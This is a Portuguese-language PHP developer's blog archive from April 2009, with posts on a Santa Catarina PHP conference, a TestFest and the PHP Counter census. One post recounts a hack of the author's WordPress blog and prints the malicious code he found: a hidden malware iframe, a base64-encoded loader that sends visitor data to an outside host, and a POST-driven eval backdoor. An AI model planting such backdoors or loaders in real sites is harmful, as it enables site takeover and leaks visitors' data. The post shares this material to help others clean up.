Archive for April, 2009

Chamada de Trabalhos PHPSC Conf 2.0/2009 – Univali, Itajaí

Friday, April 17th, 2009

O Grupo de Usuários de PHP do Estado de Santa Catarina está promovendo o evento em Itajaí – litoral do estado – em parceria com a Univali durante a Semana da Computação, nos dias 29 e 30 de Maio de 2009. E no dia 31 de Maio,  no mesmo local, será realizado o primeiro TestFest de PHP de Santa Catarina.

Para tanto, faz a chamada de trabalhos a palestrantes interessados em participar do evento, que deverão enviar suas propostas até o dia 30/04/2008. Os trabalhos deverão se encaixar em uma das duas categorias disponíveis para o evento: mini-cursos ou palestras. Se a proposta enviada for uma palestra, esta deverá ter duração de no mínimo 1 hora e no máximo 1h30.  Se mini-curso, duração mínima de 3h30 e máxima 4h.

Os assuntos para o evento deste ano foram expandidos, contemplando as seguintes áreas:

– PHP (Frameworks, melhores práticas de desenvolvimento (OO, uso do PHPUnit etc), PHP básico, IDEs para PHP, Banco de Dados e PHP entre outros assuntos);
– Cases de empresas que usaram PHP como solução tecnológica;
– Desenvolvimento ágil Scrum, XP e outras metodologias co-relacionadas;
– Rich Internet (RIA), Jquery, Prototype, Flex, Javascript, CSS;
– Iniciando no desenvolvimento Web (assuntos que envolvam PHP, JavaScript, Design e por onde começar);
– Integração de PHP com outras plataformas e linguagens;
– Como contribuir com a comunidade e como ajudar a corrigir e melhorar o PHP;

Caso a sua proposta se encaixe em um dos temas relatados envie as seguintes informações.

A seguir modelo de proposta a ser enviado:

Nome do palestrante: Fulano
Título da palestra: PHP e Oracle
Nível: Intermediário
Resumo da palestra: A palestra tem como objetivo demonstrar a utilização do banco de dados Oracle com a linguagem PHP. Também será demonstrado dicas de performance específicas na utilizaçãodeste banco. Adicionalmente serão apresentada as novidades que foram adicionadas ao Oracle 11g e como estas novidades afetam o PHP.
Minicurriculo do palestrante: Fulano possui graduação em Ciência de Computação pela universidade X e especialização em Ciência da Computação pela Y. Atualmente é Analista de Sistemas da empresa W e Professor da faculdade Z, ministrando disciplinas de Programação, Segurança, Sistemas Distribuídos, entre outras.
Categoria: Palestra
Duração: 1:15
Currículo: Contendo informações adicionais e se já palestrou em algum evento do gênero.

As propostas devem ser enviadas para conf @ phpsc.com.br.

Maiores informações serão divulgadas durante o[s] meses de Abril/Maio no site do grupo e na lista do Yahoo http://br.groups.yahoo.com/group/php-santacatarina

Censo Nacional de PHP e PHP Counter

Sunday, April 12th, 2009

Hoje vou lhes contar brevemente como surgiu a idéia do PHP Counter, porém contando a minha versão até onde iniciou a parceria com o Er Galvão.

Eu trabalho profissionalmente com PHP desde 2001, e ao longo destes anos fui identificando algumas tendências e preocupações entre os profissionais que também utilizam o PHP.
Em 2006 escrevi um artigo no PHPBrasil.com, que teve muito sucesso e interesse: http://www.phpbrasil.com/articles/article.php/id/1286, falando de uma forma subjetiva em como eu via a situação do nosso mercado.

O artigo se espalhou por vários sites e inclusive trouxe muitos visitantes para o meu blog: http://www.silvano.pro.br/2006/07/09/quanto-vale-um-programador-php/

Porém, eu considero meu artigo bastante incompleto, porque não mostra objetivamente a situação do mercado. Muitas pessoas notaram isto e perguntaram nos comentários, e então comecei a pensar em como conseguir estes dados para que eu pudesse escrever um novo artigo, mostrando a realidade com números.

Eis que surgiu então a idéia de criar um Censo Nacional de PHP, buscando a participação do maior número possível dos profissionais da área. Mas isto aconteceu há três anos e desde então eu procurava tempo e disposição para colocar o projeto em prática.

Há dois anos me tornei Gerente de Desenvolvimento de Aplicações da InPhonex, e quando abríamos vagas para novos desenvolvedores a minha preocupação se agravava ainda mais. Era, e ainda é, muito difícil encontrar profissionais que utilizam PHP com qualidade. Isto me levou a agregar mais idéias à idéia do Censo. Os dados do Censo agora não serviriam apenas para mostrar a realidade do mercado. Estes dados poderiam ser utilizados em parceria com os grupos de usuários e empresas para capacitar mais profissionais! Pois sabendo quais as deficiências de cada região, os grupos locais podem atuar nestas deficiências e reverter o quadro.

Em 2007, em uma conversa com o Galvão, expus esta minha idéia e ele também me revelou outra, a de criar um registro de profissionais no estilo “Linux Registered Users”. Então pensamos: que tal unir as duas idéias em uma só? E assim começamos 🙂

De 2007 pra cá, vimos utilizando os curtos períodos de tempo para discutir o projeto e tentar criar um sistema que fosse interessante para o público alvo. 2 anos se passaram e finalmente resolvemos realizar um pré-lançamento, que aconteceu no dia 6 de abril de 2009, e marcar uma data para o lançamento oficial do projeto, que acontecerá durante a PHP Conf.

Como sou um dos coordenadores do grupo PHP SC, participo também do grupo PHP Brasil Comunidades. Lá divulguei este nosso projeto e busquei o apoio dos demais Grupos de Usuários do páis. O apoio foi unânime! O que, aliás, me deixou muito feliz. Só tenho a agradecer aos meus colegas de profissão!

Menos de uma semana se passou e o projeto tem se mostrado muito bem aceito.

Se você ainda não participou, participe! http://www.phpcounter.org

E se possível, ajude a divulgar 🙂

Muito obrigado a todos que estão contribuindo com este projeto e direta ou indiretamente com o crescimento do mercado PHP no Brasil!

Recomeço…

Friday, April 10th, 2009

Há alguns dias, notei algumas diferenças com relação ao meu blog e principalmente no meu pagerank, que antes era de modestos 4/10.

Antes, quando você entrava no google.com.br e digitava “programador php”, meu site era o primeiro da lista. De tempos em tempos costumo verificar se esta situação se mantem e na minha última tentativa, espanto! Meu blog simplesmente sumiu do google!
Chequei meu pagerank e outro susto: estava zerado!

O que diabos estava acontecendo?

Então comecei a checar os códigos do wordpress e encontrei alguns, problemas:

1 – havia um iframe no final das minhas páginas:

<iframe src=”http:// google – stat .com /tomi/?t=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
(coloquei os espaços no domímio porque não quero gerar mais tráfego para este indivíduo)

Para remover: se você tem acesso SSH ao seu servidor, você pode remover este iframe de todas as páginas com o comando:

find ./* -type f -exec sed -i 's/<iframe src="http:\/\/google - stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
(remova os espaços no domínio)

Ao entrar no meu blog, aparecia um PDF para fazer download. WTF?! Era culpa deste iframe, que injetava um vírus no documento.

2 – o .htaccess foi modificado

Meu .htaccess foi modificado. Quando qualquer bot de engine de busca acessava meu site, ele era automaticamente redirecionado para outro site. Fiquei tão P* que deletei e não tenho aqui o conteúdo do .htaccess

3 – havia um código php malicioso no index.php que gerava links aleatórios para outros sites.

eval(base64_decode(‘JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs=’));

O resultado do decode é este:

$ch=curl_init(“http://usr-52. adsl .md/inc2.php?host=”.urlencode($_SERVER[“HTTP_HOST”]).”&ip=”.urlencode($_SERVER[“REMOTE_ADDR”]).”&agent=”.urlencode($_SERVER[“HTTP_USER_AGENT”])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;

4 – em diversas páginas encontrei mais códigos maliciosos que poderiam executar qualquer coisa enviada pelo indivíduo que fez isso em meu blog.

Eis aqui como ele se parece:

<?php if($_GET[‘9e26465b24966559’]==”a2bc87015a3f0dc6″){ eval(base64_decode($_POST[‘file’])); exit; } ?>

Este trecho do código aparece em muitas páginas e o nome e valor da variável $_GET sempre muda.

Faça uma busca nos seus códigos por eval(base64_decode e se encontrar algo, remova imediatamente.

5 – havia um arquivo wp-content/cache.php

Este arquivo era simplesmente uma shell escrita em php, chamada r57shell
Busque este arquivo ou o nome desta shell e se encontrar… é meu querido… bem vindo ao clube.

É bem provável que outras coisas tenham sido adicionadas, então eu decidi limpar tudo e reinstalar o WP, porém agora com a última versão.

Ainda não sei como este cara teve acesso, mas provavelmente foi alguma vulnerabilidade no WP ou algum plugin que eu estava utilizando.
(mas ainda tenho dúvidas se não foi algo com a dreamhost, pois eles mudaram meus sites de servidor recentemente)

Se você utiliza wordpress, recomendo que utilize este plugin: http://wordpress.org/extend/plugins/exploit-scanner/

Enfim… o que me resta agora é tentar recuperar meu pagerank.

Abraço!

PHP Counter – Pré Lançamento

Sunday, April 5th, 2009

É com muito orgulho que lhes apresento meu projeto em parceria com Er Galvão: PHP Counter

O Projeto

O objetivo do projeto é ser uma referência para o mercado PHP mundial, fornecendo dados estatísticos que propiciarão a análise e evolução do mercado através da atuação em conjunto com grupos de usuários, empresas e profissionais.

Periodicamente serão realizados censos buscando que os profissionais façam seus cadastros ou os atualizem para que os dados sempre mostrem a realidade atual. Disponibilizaremos ferramentas para que os grupos de usuários possam ter acesso aos dados.

É importante frisar que em nenhum momento do projeto os dados preenchidos pelos usuários serão atrelados à qualquer forma de identificação. Informações como nome, número de registro, e-mail ou qualquer outra forma de identificação não serão disponibilizados para visualização nos resultados do censo.

Pré-lançamento

Estamos realizando um pré-lançamento desta iniciativa no Brasil visando a obtenção de dados para o lançamento oficial que será realizado durante a PHP Conference Brasil ’09.

No lançamento oficial, onde a iniciativa será extendida à outros países, cada usuário que participou do censo será contemplado com um número de registro, à exemplo de iniciativas similares, como “Linux Counter” e “Ubuntu Counter”. Usuários que aderirem ao censo após o lançamento oficial receberão seus números de registro automaticamente através da ferramenta disponível no site.

Participe!

Clique aqui para acessar o formulário e fazer seu cadastro! Faça parte do projeto e dê sua contribuição para o crescimento desta que é uma das linguagens mais utilizadas no mundo!

Primeiro PHP TestFest de Santa Catarina

Friday, April 3rd, 2009

PHP TestFestNos dias 29 e 30 de maio o grupo PHPSC vai promover o segundo PHPSC Conf que acontecerá no campus da Univali de Itajaí.
Estamos trabalhando nos preparativos e em breve traremos maiores informações como a grade de palestras, mini-cursos, hotéis, caravanas e etc.
Aguardem pois teremos novidades!

Para aproveitar a estrutura oferecida pela Univali e trazer este projeto para Santa Catarina, estaremos também promovendo o nosso primeiro PHP TestFest, como podem ver aqui: http://wiki.php.net/qa/testfest e que será realizado no dia 31 de maio, seguido de um PHPinga!
Mais informações sobre o TestFest estão disponíveis aqui: http://qa.php.net/testfest.php

Precisamos saber quantas pessoas vão participar, pois temos que preparar a estrutura para vocês!

Os interessados por gentileza façam seu cadastro aqui: http://spreadsheets.google.com/viewform?hl=pt-BR&formkey=cGJUYS1ESkxzZ1F0ZFZ1R29vZjMzZUE6MA..

Obrigado a todos!